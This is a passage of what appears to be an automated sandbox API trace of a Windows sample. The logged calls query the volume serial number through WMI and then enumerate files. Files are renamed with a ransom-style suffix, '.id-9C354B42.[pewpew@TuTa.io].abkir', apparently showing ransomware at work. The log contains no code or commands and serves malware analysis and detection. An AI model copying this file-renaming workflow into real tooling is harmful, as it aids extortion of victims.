Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x949e7c4 | out: ppvObject=0x949e7c4*=0x6024b80) returned 0x0 [0156.199] WbemLocator:IUnknown:AddRef (This=0x6024b80) returned 0x3 [0156.199] WbemLocator:IUnknown:Release (This=0x6024b80) returned 0x2 [0156.199] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025fb0, puCount=0x949e95c | out: puCount=0x949e95c*=0x2) returned 0x0 [0156.199] WbemDefPath:IWbemPath:GetText (in: This=0x6025fb0, lFlags=8, puBuffLength=0x949e958*=0x0, pszText=0x0 | out: puBuffLength=0x949e958*=0xf, pszText=0x0) returned 0x0 [0156.199] WbemDefPath:IWbemPath:GetText (in: This=0x6025fb0, lFlags=8, puBuffLength=0x949e958*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e958*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0156.199] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x949e834 | out: ppv=0x949e834*=0x6024b90) returned 0x0 [0156.200] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6024b90, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x949e8c8 | out: ppNamespace=0x949e8c8*=0x602481c) returned 0x0 [0157.504] WbemLocator:IUnknown:QueryInterface (in: This=0x602481c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e764 | out: ppvObject=0x949e764*=0xb5b7c4) returned 0x0 [0157.504] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5b7c4, pProxy=0x602481c, pAuthnSvc=0x949e7b4, pAuthzSvc=0x949e7b0, pServerPrincName=0x949e7a8, pAuthnLevel=0x949e7ac, pImpLevel=0x949e79c, pAuthInfo=0x949e7a0, pCapabilites=0x949e7a4 | out: pAuthnSvc=0x949e7b4*=0xa, pAuthzSvc=0x949e7b0*=0x0, pServerPrincName=0x949e7a8, pAuthnLevel=0x949e7ac*=0x6, pImpLevel=0x949e79c*=0x2, pAuthInfo=0x949e7a0, pCapabilites=0x949e7a4*=0x1) returned 0x0 [0157.504] WbemLocator:IUnknown:Release (This=0xb5b7c4) returned 0x1 [0157.504] WbemLocator:IUnknown:QueryInterface (in: This=0x602481c, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e758 | out: ppvObject=0x949e758*=0xb5b7e4) returned 0x0 [0157.504] WbemLocator:IUnknown:QueryInterface (in: This=0x602481c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e754 | out: ppvObject=0x949e754*=0xb5b7c4) returned 0x0 [0157.504] WbemLocator:IClientSecurity:SetBlanket (This=0xb5b7c4, pProxy=0x602481c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0157.505] WbemLocator:IUnknown:Release (This=0xb5b7c4) returned 0x2 [0157.505] WbemLocator:IUnknown:Release (This=0xb5b7e4) returned 0x1 [0157.505] CoTaskMemFree (pv=0xbd4a68) [0157.505] WbemLocator:IUnknown:Release (This=0x6024b90) returned 0x0 [0157.505] WbemLocator:IUnknown:QueryInterface (in: This=0x602481c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e354 | out: ppvObject=0x949e354*=0xb5b7e4) returned 0x0 [0157.505] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b7e4, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e310 | out: ppvObject=0x949e310*=0x0) returned 0x80004002 [0157.513] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b7e4, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e12c | out: ppvObject=0x949e12c*=0x0) returned 0x80004002 [0157.514] WbemLocator:IUnknown:AddRef (This=0xb5b7e4) returned 0x3 [0157.514] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b7e4, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949dc6c | out: ppvObject=0x949dc6c*=0x0) returned 0x80004002 [0157.514] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b7e4, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949dc1c | out: ppvObject=0x949dc1c*=0x0) returned 0x80004002 [0157.515] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b7e4, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949dc28 | out: ppvObject=0x949dc28*=0xb5b744) returned 0x0 [0157.515] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5b744, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949dc30 | out: pCid=0x949dc30*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0157.515] WbemLocator:IUnknown:Release (This=0xb5b744) returned 0x3 [0157.515] CoGetContextToken (in: pToken=0x949dc88 | out: pToken=0x949dc88) returned 0x0 [0157.515] CoGetContextToken (in: pToken=0x949e090 | out: pToken=0x949e090) returned 0x0 [0157.515] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b7e4, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e120 | out: ppvObject=0x949e120*=0xb5b7cc) returned 0x0 [0157.515] WbemLocator:IRpcOptions:Query (in: This=0xb5b7cc, pPrx=0xb5b7e4, dwProperty=2, pdwValue=0x949e148 | out: pdwValue=0x949e148) returned 0x80004002 [0157.515] WbemLocator:IUnknown:Release (This=0xb5b7cc) returned 0x3 [0157.515] WbemLocator:IUnknown:Release (This=0xb5b7e4) returned 0x2 [0157.515] CoGetContextToken (in: pToken=0x949e668 | out: pToken=0x949e668) returned 0x0 [0157.515] CoGetContextToken (in: pToken=0x949e5c8 | out: pToken=0x949e5c8) returned 0x0 [0157.516] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b7e4, riid=0x949e698*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x949e694 | out: ppvObject=0x949e694*=0x602481c) returned 0x0 [0157.516] WbemLocator:IUnknown:AddRef (This=0x602481c) returned 0x4 [0157.516] WbemLocator:IUnknown:Release (This=0x602481c) returned 0x3 [0157.516] WbemLocator:IUnknown:Release (This=0x602481c) returned 0x2 [0157.516] SysStringLen (param_1=0x0) returned 0x0 [0157.516] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025f40, puCount=0x949ea2c | out: puCount=0x949ea2c*=0x0) returned 0x0 [0157.516] WbemDefPath:IWbemPath:GetText (in: This=0x6025f40, lFlags=2, puBuffLength=0x949ea28*=0x0, pszText=0x0 | out: puBuffLength=0x949ea28*=0x20, pszText=0x0) returned 0x0 [0157.516] WbemDefPath:IWbemPath:GetText (in: This=0x6025f40, lFlags=2, puBuffLength=0x949ea28*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949ea28*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0157.516] CoGetContextToken (in: pToken=0x949e698 | out: pToken=0x949e698) returned 0x0 [0157.516] WbemLocator:IUnknown:AddRef (This=0xb5b7e4) returned 0x3 [0157.516] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b7e4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e52c | out: ppvObject=0x949e52c*=0xb5b7e4) returned 0x0 [0157.516] WbemLocator:IUnknown:Release (This=0xb5b7e4) returned 0x3 [0157.516] WbemLocator:IUnknown:Release (This=0xb5b7e4) returned 0x2 [0157.516] WbemDefPath:IWbemPath:GetText (in: This=0x6025f40, lFlags=2, puBuffLength=0x949ea30*=0x0, pszText=0x0 | out: puBuffLength=0x949ea30*=0x20, pszText=0x0) returned 0x0 [0157.516] WbemDefPath:IWbemPath:GetText (in: This=0x6025f40, lFlags=2, puBuffLength=0x949ea30*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949ea30*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0157.516] IWbemServices:GetObject (in: This=0x602481c, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x949e9e4*=0x0, ppCallResult=0x0 | out: ppObject=0x949e9e4*=0x6027e50, ppCallResult=0x0) returned 0x0 [0157.533] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025fb0, puCount=0x949e9e4 | out: puCount=0x949e9e4*=0x2) returned 0x0 [0157.533] WbemDefPath:IWbemPath:GetText (in: This=0x6025fb0, lFlags=4, puBuffLength=0x949e9e0*=0x0, pszText=0x0 | out: puBuffLength=0x949e9e0*=0xf, pszText=0x0) returned 0x0 [0157.533] WbemDefPath:IWbemPath:GetText (in: This=0x6025fb0, lFlags=4, puBuffLength=0x949e9e0*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e9e0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0157.534] IWbemClassObject:Get (in: This=0x6027e50, wszName="VolumeSerialNumber", lFlags=0, pVal=0x949e9e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3784e54*=0, plFlavor=0x3784e58*=0 | out: pVal=0x949e9e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3784e54*=8, plFlavor=0x3784e58*=0) returned 0x0 [0157.534] SysStringByteLen (bstr="9C354B42") returned 0x10 [0157.534] SysStringByteLen (bstr="9C354B42") returned 0x10 [0157.534] IWbemClassObject:Get (in: This=0x6027e50, wszName="VolumeSerialNumber", lFlags=0, pVal=0x949e9e8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3784e54*=8, plFlavor=0x3784e58*=0 | out: pVal=0x949e9e8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3784e54*=8, plFlavor=0x3784e58*=0) returned 0x0 [0157.534] SysStringByteLen (bstr="9C354B42") returned 0x10 [0157.534] SysStringByteLen (bstr="9C354B42") returned 0x10 [0157.534] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\GoogleUpdateSetup.exe", nBufferLength=0x105, lpBuffer=0x949e5e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\GoogleUpdateSetup.exe", lpFilePart=0x0) returned 0xa0 [0157.534] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\GoogleUpdateSetup.exe.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x949e5e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\GoogleUpdateSetup.exe.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0xc3 [0157.534] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ea48) returned 1 [0157.534] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\GoogleUpdateSetup.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\googleupdatesetup.exe"), fInfoLevelId=0x0, lpFileInformation=0x949eac4 | out: lpFileInformation=0x949eac4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x1a9a8e60, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0157.534] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ea44) returned 1 [0157.534] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\GoogleUpdateSetup.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\googleupdatesetup.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\GoogleUpdateSetup.exe.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\googleupdatesetup.exe.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0157.535] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949eb8c) returned 1 [0157.535] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec", nBufferLength=0x105, lpBuffer=0x949e694, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec", lpFilePart=0x0) returned 0x85 [0157.535] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\", nBufferLength=0x105, lpBuffer=0x949e668, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\", lpFilePart=0x0) returned 0x86 [0157.535] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\*", lpFindFileData=0x949e8b4 | out: lpFindFileData=0x949e8b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a3a0420, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a3a0420, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f490 [0157.753] FindNextFileW (in: hFindFile=0xb7f490, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a3a0420, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a3a0420, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0157.754] FindNextFileW (in: hFindFile=0xb7f490, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a307ea0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x3c50, dwReserved0=0x0, dwReserved1=0x0, cFileName="clickonce_bootstrap.exe", cAlternateFileName="CLICKO~1.EXE")) returned 1 [0157.754] FindNextFileW (in: hFindFile=0xb7f490, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a37a2c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x42d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="clickonce_bootstrap.exe.cdf-ms", cAlternateFileName="")) returned 1 [0157.754] FindNextFileW (in: hFindFile=0xb7f490, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a37a2c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x354b, dwReserved0=0x0, dwReserved1=0x0, cFileName="clickonce_bootstrap.exe.manifest", cAlternateFileName="")) returned 1 [0157.754] FindNextFileW (in: hFindFile=0xb7f490, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a37a2c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xee0, dwReserved0=0x0, dwReserved1=0x0, cFileName="clickonce_bootstrap_unsigned.cdf-ms", cAlternateFileName="CLICKO~1.CDF")) returned 1 [0157.754] FindNextFileW (in: hFindFile=0xb7f490, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a37a2c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x560, dwReserved0=0x0, dwReserved1=0x0, cFileName="clickonce_bootstrap_unsigned.manifest", cAlternateFileName="CLICKO~1.MAN")) returned 1 [0157.755] FindNextFileW (in: hFindFile=0xb7f490, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a295a80, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x113f58, dwReserved0=0x0, dwReserved1=0x0, cFileName="GoogleUpdateSetup.exe", cAlternateFileName="")) returned 1 [0157.755] FindNextFileW (in: hFindFile=0xb7f490, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0157.755] FindClose (in: hFindFile=0xb7f490 | out: hFindFile=0xb7f490) returned 1 [0157.756] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eb4c) returned 1 [0157.756] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eb58) returned 1 [0157.756] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949eb8c) returned 1 [0157.756] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec", nBufferLength=0x105, lpBuffer=0x949e694, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec", lpFilePart=0x0) returned 0x85 [0157.756] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\", nBufferLength=0x105, lpBuffer=0x949e668, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\", lpFilePart=0x0) returned 0x86 [0157.756] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\*", lpFindFileData=0x949e8b4 | out: lpFindFileData=0x949e8b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a3a0420, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a3a0420, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f490 [0157.757] FindNextFileW (in: hFindFile=0xb7f490, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a3a0420, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a3a0420, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0157.757] FindNextFileW (in: hFindFile=0xb7f490, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a307ea0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x3c50, dwReserved0=0x0, dwReserved1=0x0, cFileName="clickonce_bootstrap.exe", cAlternateFileName="CLICKO~1.EXE")) returned 1 [0157.757] FindNextFileW (in: hFindFile=0xb7f490, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a37a2c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x42d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="clickonce_bootstrap.exe.cdf-ms", cAlternateFileName="")) returned 1 [0157.758] FindNextFileW (in: hFindFile=0xb7f490, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a37a2c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x354b, dwReserved0=0x0, dwReserved1=0x0, cFileName="clickonce_bootstrap.exe.manifest", cAlternateFileName="")) returned 1 [0157.758] FindNextFileW (in: hFindFile=0xb7f490, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6a37a2c0, 